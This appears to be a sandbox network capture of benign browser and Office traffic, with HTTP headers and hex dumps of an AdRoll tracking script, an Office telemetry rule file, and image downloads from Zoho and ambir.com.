                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 63 5f 6e 75 6d 62 65 72 7c 63 72 65 64 69 74 5f 63 61 72 64 7c 63 61 72 64 5f 6e 75 6d 62 65 72 7c 63 76 5b 63 76 5d 5f 63 6f 64 65 2f 29 7c 7c 64 2e 69 73 5f 6c 75 68 6e 28 75 6e 65 73 63 61 70 65 28 63 29 29 3f 62 2b 22 3d 4e 52 5f 52 45 44 41 43 54 22 3a 62 2b 22 3d 22 2b 63 7d 29 3b 63 5b 31 5d 21 3d 3d 65 26 26 28 61 3d 63 5b 30 5d 2b 22 3f 22 2b 65 29 7d 62 26 26 28 61 2b 3d 62 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 5f 6c 75 68 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 72 65 74 75 72 6e 21 31 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 3b 69 66 28 31 33 3e 61 2e 6c 65 6e 67 74 68 7c 7c 31 39
                                                                                                                                                                                              Data Ascii: c_number|credit_card|card_number|cv[cv]_code/)||d.is_luhn(unescape(c))?b+"=NR_REDACT":b+"="+c});c[1]!==e&&(a=c[0]+"?"+e)}b&&(a+=b);return a};__adroll__.prototype.is_luhn=function(a){if("string"!==typeof a)return!1;a=a.replace(/\D/g,"");if(13>a.length||19
                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 20 7b 0a 76 61 72 20 72 74 62 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 0a 72 74 62 2e 73 74 79 6c 65 5b 22 77 69 64 74 68 22 5d 20 3d 20 22 31 70 78 22 3b 0a 72 74 62 2e 73 74 79 6c 65 5b 22 68 65 69 67 68 74 22 5d 20 3d 20 22 31 70 78 22 3b 0a 72 74 62 2e 73 74 79 6c 65 5b 22 64 69 73 70 6c 61 79 22 5d 20 3d 20 22 69 6e 6c 69 6e 65 22 3b 0a 72 74 62 2e 73 74 79 6c 65 5b 22 70 6f 73 69 74 69 6f 6e 22 5d 20 3d 20 22 61 62 73 6f 6c 75 74 65 22 3b 0a 72 74 62 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 5b 22 2f 63 6d 2f 62 2f 6f 75 74 3f 61 64 76 65 72 74 69 73 61 62 6c 65 3d 47 58 58 54 33 44 4a 4a 4e 4e 42 4b 48 47 42 43 36 32 52 41 4e 44 22 2c 22 2f 63 6d 2f 65 78 70 65 72 69 61 6e 2f 6f 75 74 3f 61 64
                                                                                                                                                                                              Data Ascii: {var rtb = document.createElement("div");rtb.style["width"] = "1px";rtb.style["height"] = "1px";rtb.style["display"] = "inline";rtb.style["position"] = "absolute";rtb.innerHTML = ["/cm/b/out?advertisable=GXXT3DJJNNBKHGBC62RAND","/cm/experian/out?ad
                                                                                                                                                                                              2024-11-20 20:28:29 UTC5543INData Raw: 65 6e 74 5b 6a 5d 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 6f 62 6a 65 63 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 6f 63 68 65 63 6b 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 61 64 72 6f 6c 6c 49 64 65 6e 74 69 66 79 49 66 50 6f 73 73 69 62 6c 65 28 29 20 7b 0a 20 20 20 20 76 61 72 20 69 64 65 6e 74 69 74 79 5f 70 61 79 6c 6f 61 64 20 3d 20 7b 7d 3b 0a 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 5f 65 6d 61 69 6c 5f 76 61 72 73 20 3d 20 5b 0a 20 20 20 20 20 20 20 20 22 61 64 72 6f 6c 6c 5f 65 6d 61 69 6c 22 2c 0a 20 20
                                                                                                                                                                                              Data Ascii: ent[j]]; } if (!object.hasOwnProperty(tocheck)) { return false; } } return true;}function adrollIdentifyIfPossible() { var identity_payload = {}; var possible_email_vars = [ "adroll_email",


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              97192.168.2.54983113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                              x-ms-request-id: 947c7cf8-001e-00a2-018c-3ad4d5000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202828Z-185f5d8b95c5lcmhhC1NYCsnsw0000000atg00000000ptf0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:28 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              98192.168.2.549836199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC404OUTGET /forms/images/warning-info.607d397302b1f344f8d8df1258004046.png HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:29 UTC740INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 609
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "795e63fefb59c2bff5f31b157b6d01e9"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 10:00:05 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: HIT
                                                                                                                                                                                              nb-request-id: ddedd9a46bbcc010fc763dca8acc2083
                                                                                                                                                                                              z-origin-id: sa1-83d08e6db6d945c09e932770a0145309
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:29 UTC609INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 46 00 00 00 45 08 03 00 00 00 c0 64 60 18 00 00 00 30 50 4c 54 45 47 70 4c e2 55 38 e9 5c 46 e8 5c 46 e9 5c 45 ea 5d 45 ea 5d 45 ef 5f 3f ea 5c 45 ea 5c 45 ff 00 00 ea 5d 43 eb 5b 43 ff 3f 3f ea 5b 47 e9 5c 44 50 56 dc ed 00 00 00 10 74 52 4e 53 00 09 24 50 8f e0 ff 10 63 c3 01 31 40 04 19 a8 e6 64 3c ab 00 00 01 d0 49 44 41 54 78 da d5 98 e9 9a 85 20 08 86 73 2b b7 ec fe ef 76 e6 d8 42 13 21 e9 71 36 7e d5 13 bd 7d 28 29 38 fc 1b 13 52 69 33 ae 66 b4 92 a2 81 31 59 37 5e cd d9 a9 8a e1 c3 c6 c0 a4 e8 1f 43 a2 19 69 33 0f 41 12 20 5a 85 69 b5 a0 34 80 24 0f 99 f5 ee 6c d3 45 64 b2 66 c7 cf 0c 25 6d 9e 4e fa bb 70 a5 db be 91 8a 94 b8 43 48 8f 1d 14 0b 14 7b b8 f0 9f b2 0c 65 11 5c 5a 2e 45 8e 5d 9f
                                                                                                                                                                                              Data Ascii: PNGIHDRFEd`0PLTEGpLU8\F\F\E]E]E_?\E\E]C[C??[G\DPVtRNS$Pc1@d<IDATx s+vB!q6~}()8Ri3f1Y7^Ci3A Zi4$lEdf%mNpCH{e\Z.E]


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              99192.168.2.549839141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1892OUTGET /wp-content/uploads/2023/08/slide2-1024x603.jpg HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:29 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 78918
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=79685
                                                                                                                                                                                              ETag: "66c6198e-13745"
                                                                                                                                                                                              Last-Modified: Wed, 21 Aug 2024 16:45:02 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10822
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fc89b5243cf-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:29 UTC890INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 84 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0e 09 09 08 08 09 12 0d 0d 0a 0e 15 12 16 16 15 12 14 14 17 1a 21 1c 17 18 1f 19 14 14 1d 27 1d 1f 22 23 25 25 25 16 1c 29 2c 28 24 2b 21 24 25 24 01 06 06 06 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 ff c2 00 11 08 02 5b 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 00 07 08 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 ae 56 e4 b9 79 a8 37 20 d0 65 51 72
                                                                                                                                                                                              Data Ascii: JFIF``!'"#%%%),($+!$%$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$["5Vy7 eQr
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: c9 bb 65 8e d8 d9 5f 8b 8c cc ba 4c 22 11 a8 c2 20 d3 9a 61 90 64 73 5e 9b 41 20 12 89 de d7 a7 f5 5b 5c 8a 8e 45 68 2f 37 81 ca c4 4c 88 d5 88 ac e4 4d 5e c5 43 db ca c6 71 10 19 cf 44 73 9a 80 e6 3b 86 3e 7b 42 37 95 6c be 74 b2 b9 4b 5e fb a1 3f 77 e5 31 43 ea bd 2f cb 3e b1 45 9a 6a e9 d1 2b 98 9a 4e 52 62 1f 93 11 15 62 d8 23 a2 61 7b 4b 16 61 91 03 88 e6 a1 cd e7 26 d2 29 10 c7 39 c9 a1 79 c8 6b 8d c0 e2 77 98 ca 3a d0 7c 9f 3f a1 97 de f1 98 da 9b 23 b0 b2 f3 c6 4e 1f 41 fa 37 c4 fe d1 9a ff 00 70 8c 66 73 f4 c3 0c 86 39 45 64 a1 22 b9 87 1b 63 19 d8 00 64 90 d9 18 c2 3b 64 a0 36 43 23 28 ad 93 1d 8e 43 16 70 84 67 2b 18 92 18 d4 75 33 1c 5a c9 0c 9c 11 5a 49 c4 1c f6 b2 20 e4 45 ae 6a 37 72 1a f1 a4 5b 1c d7 42 6a 8e e4 d9 b1 ca ea 2c af c7 c4 56
                                                                                                                                                                                              Data Ascii: e_L" ads^A [\Eh/7LM^CqDs;>{B7ltK^?w1C/>Ej+NRbb#a{Ka&)9ykw:|?#NA7pfs9Ed"cd;d6C#(Cpg+u3ZZI Ej7r[Bj,V
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 15 af 89 62 d3 82 63 8e 13 26 a1 30 81 ec e1 ca 3e d2 42 c8 e7 5d 5d d7 21 1d 3a 5d f0 51 f5 d0 59 5c 49 ac 10 03 21 96 c2 2b 94 2c 90 ea b0 57 2b f5 ce ac 27 a2 76 7c d1 7a 1f 61 f2 5f 4c e9 f3 44 79 4b bf 14 58 76 95 f6 c2 ba 19 9d 35 e2 18 0f a4 fc 03 95 d7 c8 5c 3e 64 09 fb df 2b d9 57 67 97 d4 5f 5e 69 cf 61 6d 49 a3 e6 f5 f3 e2 f7 11 67 b7 c5 fd aa 82 ae fc 1a df 0f a5 cb f5 39 b7 71 e1 5a 74 b2 af b9 f8 d5 85 95 fd 03 23 ce 3d 1f ce 75 de 51 2e 5b 8c ac 20 95 e3 7a 1c f6 2a 6e 73 51 22 b7 91 b7 79 fe f9 a4 fc 3d 7d b6 9e 56 79 dc a6 b6 3a 9b ab ca 8f d5 f9 8d 93 e0 c7 ee 71 ef db 99 ae be ad ac cc 5d b6 0d 57 56 55 4b e0 bd 4e 86 7e 58 d1 b1 be 73 ec 58 05 2f 3c bb 65 6d 86 b2 66 32 ce b8 d8 d3 5c 59 87 9e c4 d1 66 35 d0 39 55 55 3d 0c 56 99 3b 69
                                                                                                                                                                                              Data Ascii: bc&0>B]]!:]QY\I!+,W+'v|za_LDyKXv5\>d+Wg_^iamIg9qZt#=uQ.[ z*nsQ"y=}Vy:q]WVUKN~XsX/<emf2\Yf59UU=V;i
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 78 f4 7b 79 3b 91 c8 a0 32 0d 81 20 d1 64 08 83 73 d3 61 64 1a bb 62 ca 81 47 56 bd 2e 66 27 74 73 a5 3d ad 77 ba f1 83 a6 b0 87 6d 70 c6 58 fb 73 42 c8 da 45 4a de 7c 39 74 68 33 d8 bd 5e 6c 8b 6a 83 d1 6e d8 e6 af f9 87 d0 e2 4a 04 bc fa aa 01 22 be ab ba 13 87 65 50 e2 5f 46 23 e4 da aa 8b 9d bc ec d7 a4 f9 ef b0 45 68 32 b6 33 b0 6a c8 f9 c6 cb 2f d4 c5 b8 9d 59 60 a5 75 6f 41 a2 b6 98 a3 2b 72 da a8 a3 40 a3 1d 10 22 b1 63 20 30 e2 4e 74 1b 3a bb a1 82 93 12 4d d2 1b 9a e0 ab 20 89 09 4d 45 4b 62 77 09 e9 a2 b5 50 36 b9 b6 2f a5 7a dd bb 79 95 5d 68 d1 57 2d 87 35 01 f3 12 c8 c7 74 84 b6 b8 e9 20 37 54 36 11 b3 88 d8 56 b0 4d 20 da 10 cc 27 11 47 92 11 01 cc 03 73 4b 4c 18 cb 59 9b 86 c8 cb ce 37 72 c7 45 be dd 6d f3 d4 c8 1e dd f2 97 a6 f9 05 76 62
                                                                                                                                                                                              Data Ascii: x{y;2 dsadbGV.f'ts=wmpXsBEJ|9th3^ljnJ"eP_F#Eh23j/Y`uoA+r@"c 0Nt:M MEKbwP6/zy]hW-5t 7T6VM 'GsKLY7rEmvb
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 27 a0 f3 c3 47 a3 18 c2 34 43 69 1a 80 b0 a3 00 88 a2 18 c4 41 26 c0 90 28 60 9c 04 d1 9c 34 f9 ac 60 dc c6 35 32 35 8a 0e 20 9d 38 cb 97 02 6d f5 4c 30 8d 6d 4a 8f 52 3f 26 d6 e9 b3 9c de 8c 7d 96 3b 57 38 49 70 a4 57 68 e9 ae 6a e5 0e 74 a5 74 a4 87 4a ae fa 8b f8 70 99 f5 a9 c4 7b 6a 7a aa b4 34 23 24 99 5f 63 5a e2 1e 1a c6 4e b2 aa b4 aa cd 07 77 64 bd a8 e4 4d 88 e4 06 c4 97 cc f9 53 27 ef 5e 75 dd e7 e7 2d 48 b6 d6 2a f9 4d 92 63 9f c0 70 99 76 65 86 92 92 ea e0 2d cb ee a6 2d cd 31 f5 64 dc 48 ae d0 fc bf df 4c d0 bb ce a7 0c 6d 56 37 da fd 57 06 58 4f 06 fa 4d 96 d1 65 34 56 57 c5 8d 75 77 03 8f 2b 5e 60 4b 88 fc 7a 76 ae 41 7c eb d9 47 ee 7d 56 0c 25 15 72 44 6b 10 78 99 4a fd 99 76 bd 86 8b a6 9f 69 c2 64 60 d9 09 c6 a7 b8 cf b4 2e e4 cd 7d 71
                                                                                                                                                                                              Data Ascii: 'G4CiA&(`4`525 8mL0mJR?&};W8IpWhjttJp{jz4#$_cZNwdMS'^u-H*Mcpve--1dHLmV7WXOMe4VWuw+^`KzvA|G}V%rDkxJvid`.}q
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 21 12 ba 2e 35 1c 98 5c fd 57 99 fb 3c f6 1d 65 08 ed a3 26 33 83 83 50 c1 ca 23 cd 6f 49 04 6f 6d 95 c6 b1 a5 f4 4c 1b 3d d7 ca fd 5b c9 f9 bb ab 55 ab 2b 23 8a 40 1b 8e a8 e8 39 b1 e5 02 41 82 61 32 3c a0 49 04 69 04 8f b3 1a ac f4 9e 71 19 c0 69 c2 60 06 61 80 4c 2f 8d 7a cd 2d 53 f0 3c 87 a6 f9 d7 3f 5c 5e 56 83 91 50 11 ec 70 73 9a e0 51 9c 60 d6 b9 40 2a bc 1d ed 9e 27 7b 25 ef 56 35 d6 5b f2 4d 28 89 a2 a5 ee 42 29 f3 6f d2 3e 09 9e ec 82 3d 99 ef 29 80 59 d7 21 cc 91 16 b2 63 48 4e 4c 88 e6 84 e4 47 1d 6a 8d 67 d0 1f 3c 7b fb 94 a6 c7 e4 e5 b2 2d 3a 7b 20 f8 f6 76 32 fb 4a f7 19 ac aa 44 7c 77 a6 7e 1f 20 88 2e 4c bc 2e 11 78 48 06 40 a3 0c c0 c2 09 e9 4c 26 79 5e 53 41 97 f4 3c b8 c2 30 ac 88 43 a2 d0 51 73 74 75 e2 21 3a 86 cf ce ec 8d 65 39 64
                                                                                                                                                                                              Data Ascii: !.5\W<e&3P#oIomL=[U+#@9Aa2<Iiqi`aL/z-S<?\^VPpsQ`@*'{%V5[M(B)o>=)Y!cHNLGjg<{-:{ v2JD|w~ .L.xH@L&y^SA<0CQstu!:e9d
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 66 40 f8 fa b8 7f 5e e4 fc 1f 57 28 ed f5 9e 63 a4 47 a6 3f 5f 22 9b 29 6c e8 3c 5d 3b dc 0b 2d d3 6d 30 dc 0c 05 d2 a9 e6 87 61 12 4a 5f a8 79 e7 bb 42 ca 68 fe c6 95 59 e3 90 3d c5 81 e5 57 1b be b6 9c 1b 77 ac 9c 31 32 35 20 b6 1e 15 f3 b7 b8 f8 87 a1 e3 3f 55 89 d7 39 58 b8 4f d5 46 c3 29 b3 c9 e7 b6 0b 2c 47 8b 64 1f 5f f3 ef 5a f2 fe 8a 27 99 7a 3e 5f 85 dd f3 78 57 94 dd 8e 54 28 76 70 b4 e5 97 98 e0 fa 3f 3a ae 47 51 69 b4 14 b7 fa 29 9b 06 6d 6c d5 20 1e 3e 7e a4 2b 16 0f 49 00 76 5d 0c 35 57 d9 09 63 d4 3a 98 da 73 d6 ee 3c c6 d7 93 d2 fa b3 c6 3d 47 cb 39 1d 40 2b 48 5d 14 05 00 0c 82 24 59 98 e6 49 15 58 e0 19 40 f9 29 24 09 21 2f af 82 40 fa 8f 33 1e 0c b8 21 16 29 a2 82 31 06 9b d8 c6 a0 8a 25 64 a9 30 a4 4a 33 4d 1a 44 e0 4c 56 d6 1b 5f 37
                                                                                                                                                                                              Data Ascii: f@^W(cG?_")l<];-m0aJ_yBhY=Ww125 ?U9XOF),Gd_Z'z>_xWT(vp?:GQi)ml >~+Iv]5Wc:s<=G9@+H]$YIX@)$!/@3!)1%d0J3MDLV_7
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 13 d1 d1 93 98 44 90 ab ce 43 44 a9 24 a4 19 22 fe a5 49 43 f5 9e 52 3c 59 91 61 64 18 d2 e3 46 40 61 5b 09 0f 9f c9 b3 9e 8d 73 ba c9 38 36 57 53 f3 dd 0e c8 69 9a ff 00 90 f3 fa cc a4 24 9c bc 0c d4 e6 94 3d 3b a9 ee 41 1c 9c 16 f7 b8 cb 50 d2 58 d0 b8 1f 10 4d 07 a3 54 14 ad c7 85 9f 8e 40 08 7d cf b9 f9 27 eb 2a e7 25 5a e7 14 e5 e0 4e 5e 04 47 70 35 57 81 39 78 6d 55 40 ee e5 42 2f 70 72 39 06 88 e4 04 47 20 37 95 04 9c a8 08 8e 44 fc eb e2 9f ab fe 49 ea 62 2e 9f 25 69 6c 3e 98 e0 3b 4d 1d 4d 68 24 f2 3e 6f eb f8 98 4f cb c1 a6 a6 a2 d1 ca a9 4a e7 79 26 86 d3 5e 7b 6b 30 5b db 06 ca 46 cc c4 d6 6e 01 4c b0 a2 da 44 cd 76 51 fa ca 9a 6c af ee 4c f6 5b 4c b6 83 5c fe 91 91 10 99 35 cb e6 39 ae 73 3a 51 25 7c 95 9c 47 28 04 92 ea fb 18 a9 d1 61 bd 2a
                                                                                                                                                                                              Data Ascii: DCD$"ICR<YadF@a[s86WSi$=;APXMT@}'*%ZN^Gp5W9xmU@B/pr9G 7DIb.%il>;MMh$>oOJy&^{k0[FnLDvQlL[L\59s:Q%|G(a*
                                                                                                                                                                                              2024-11-20 20:28:29 UTC1369INData Raw: 55 3f 91 58 cb 64 4e 19 24 28 09 ef e6 93 97 81 bc bc 84 ee 50 4e 5e 06 f2 f0 27 2a 82 72 a3 3b b9 41 3b b8 39 17 81 3b b8 39 17 81 a8 e4 04 45 40 44 5e 04 ee e0 4e e5 08 1f 1b fd 6d f1 6f 57 06 41 af 1d 82 91 7a c8 fa 8d 8e 4e fa c8 18 03 8b 17 2e 96 44 3a 67 86 85 a2 ce 60 d4 bd cb 9e de 72 11 92 b4 d4 b3 fa 38 f3 cc 91 cd da b6 6c d7 0c d4 7b a8 55 ce b3 a5 c2 cf 6b ad 2b 25 a9 4c b8 a3 d1 59 5f a4 42 18 71 ea cb e3 bd 5d 53 f1 42 7a 7e 7a 70 a8 f4 9f 26 0c e1 f4 e5 c7 cd 7e 8f 64 7d 37 aa 65 13 9a c1 28 38 d5 eb 64 2d 9f 58 58 ca d1 d0 26 53 63 5a 41 83 23 ca 12 2b b3 da d1 66 b7 d8 39 7a ea 51 57 91 ca a8 3e e5 e4 23 b9 c1 ce 57 07 39 48 08 e7 3c 1a f7 3c 18 e2 70 31 5c a0 d5 77 03 55 dc 09 dc a0 9d c8 0a 8a 81 dd dc 1d dd c0 9d dc 1c 8b c0 9c a8 1d
                                                                                                                                                                                              Data Ascii: U?XdN$(PN^'*r;A;9;9E@D^NmoWAzN.D:g`r8l{Uk+%LY_Bq]SBz~zp&~d}7e(8d-XX&ScZA#+f9zQW>#W9H<<p1\wU
